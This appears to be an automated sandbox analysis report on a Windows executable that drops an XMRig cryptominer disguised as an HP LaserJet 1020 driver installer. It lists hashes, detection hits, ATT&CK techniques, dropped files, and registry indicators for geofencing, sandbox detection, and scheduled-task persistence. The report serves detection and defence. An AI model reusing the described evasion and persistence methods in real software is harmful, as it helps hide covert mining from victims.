xmrig | b5967f9817bfe7f839d6199e17ff7d67d85bac94c148382277fd41ad930a298a

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240910-en
resource tags

arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
submitted
04/10/2024, 12:27

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe
Size

5.4MB
MD5

32bc051ff64f31196eb4128c8076abc5
SHA1

19d036a655ff8f75df86f127b82ae102292ae05c
SHA256

b5967f9817bfe7f839d6199e17ff7d67d85bac94c148382277fd41ad930a298a
SHA512

4ef36abceaaff7a2758092141efbd9ea3e6d02817a40f86b01da7cd2d8a9f0bb706964737875e7db5a812db272358a99376bbb5d4faee96c544a148ff30ca120
SSDEEP

98304:sMDtIXLr06AdfEThF35Pzu4QVKB4DRrMolMynO/64FcnHq3zNMwTn+f3qJ0:UrmEdF3ED1IynO1FcnHezN9Tn4b

Score

10^/10

xmrig defense_evasion discovery execution miner pyinstaller

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/files/0x000a000000023cc0-1382.dat	xmrig
behavioral2/memory/3300-1628-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/3300-2874-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/3300-3033-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/3300-3200-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/3300-3360-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/3300-3529-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/3300-3685-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/3300-3838-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig
behavioral2/memory/3300-4007-0x0000000000400000-0x0000000000AA3000-memory.dmp	xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
43	2368	powershell.exe
45	2368	powershell.exe
47	2368	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation	2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation	maintenance.exe

Executes dropped EXE 8 IoCs

pid	Process
684	2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe
1380	Setup.exe
2440	ProductInst.exe
4504	maintenance.exe
3300	idle_maintenance.exe
1984	wmntnnc
552	wmntnnc
996	maintenance.exe

Loads dropped DLL 60 IoCs

pid	Process
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc
552	wmntnnc

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English\SETDCFF.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SETDD65.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SETDDB7.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SETDC48.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SETDD16.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SETDD16.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\English\SDhp1018.CHM	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SETDC5A.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SETDC5A.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English\SETDCFF.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\English\SUhp1020.ENT	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\HPLJ1020.INF	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\English\SDhp1020.SDD	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\HP102064.CAT	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\hp1018.img	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English\ZSHP1018.CHM	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SDhp1020.DLL	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English\SDhp1020.SDD	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SETDD65.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\ZSHP1020.CHM	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SUhp1020.VER	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SETDCBE.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SDhp1020.CHM	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English\SETDD15.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SETDDA7.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SETDDC8.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\PPhp1020.DLL	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\HPLJ1020.INF	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SETDC5E.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SETDCEF.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English\SETDD04.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English\zshp1020s.dll	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SDhp1018.CHM	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English\SETDD03.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English\SUhp1020.ENT	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SETDD76.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SUhp1020.ENT	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\hp1022.img	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SETDCBF.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\English\SDhp1020.CHM	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\hp1022n.img	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English\SETDD01.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SETDD76.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SETDCBF.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\ZSHP1018.CHM	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\ZSHP1020.EXE	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\SDhp1020.DLL	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\HPLJ1020.PNF	ProductInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English\SETDD02.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SETDDB7.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\SUhp1020.VER	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SETDC59.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SETDC9E.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English\SETDD15.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ENGLISH\SETDD96.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\English	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\SETDC59.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\hp1022n.img	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\ZSHP1020.EXE	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\hplj1020.inf_amd64_5ffa82d4dfa98331\English\ZSHP1020.CHM	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{fa68f91b-d5db-1e43-8a5b-f83034225623}\HP102064.CAT	DrvInst.exe

Drops file in Program Files directory 24 IoCs

description	ioc	Process
File created	C:\Program Files\HP\HP LaserJet 1020 driver\ProductInst.exe	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\properties.ini	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\English\zshp1020s.dll	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\hp1020.img	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\HPLJ1020.INF	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\English\ZShp1020.chm	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\hp1018.img	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\hp102064.cat	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\hp1022.img	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\license.txt	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\DIFxAPI.dll	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\English\SDhp1020.SDD	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\English\SUhp1020.ent	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\hp1022n.img	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\License7z.txt	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\Strings.dll	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\SUHP1020.VER	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\drv64.cab	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\English\SDhp1018.chm	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\hp102032.cat	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\Setup.exe	ProductInst.exe
File opened for modification	C:\Program Files\HP\HP LaserJet 1020 driver\DIFxAPI.dll	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\English\SDhp1020.chm	ProductInst.exe
File created	C:\Program Files\HP\HP LaserJet 1020 driver\English\ZShp1018.chm	ProductInst.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.dev.log	ProductInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\inf\oem3.inf	DrvInst.exe
File created	C:\Windows\inf\oem3.inf	DrvInst.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2368	powershell.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0008000000023cdd-1578.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmntnnc
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmntnnc
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	maintenance.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	maintenance.exe

Checks SCSI registry key(s) 3 TTPs 26 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Phantom	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	DrvInst.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4764	timeout.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2572	schtasks.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
1380	Setup.exe
1380	Setup.exe
4504	maintenance.exe
4504	maintenance.exe
2368	powershell.exe
2368	powershell.exe
2368	powershell.exe
2368	powershell.exe
2368	powershell.exe
2368	powershell.exe
1080	powershell.exe
1080	powershell.exe
2368	powershell.exe
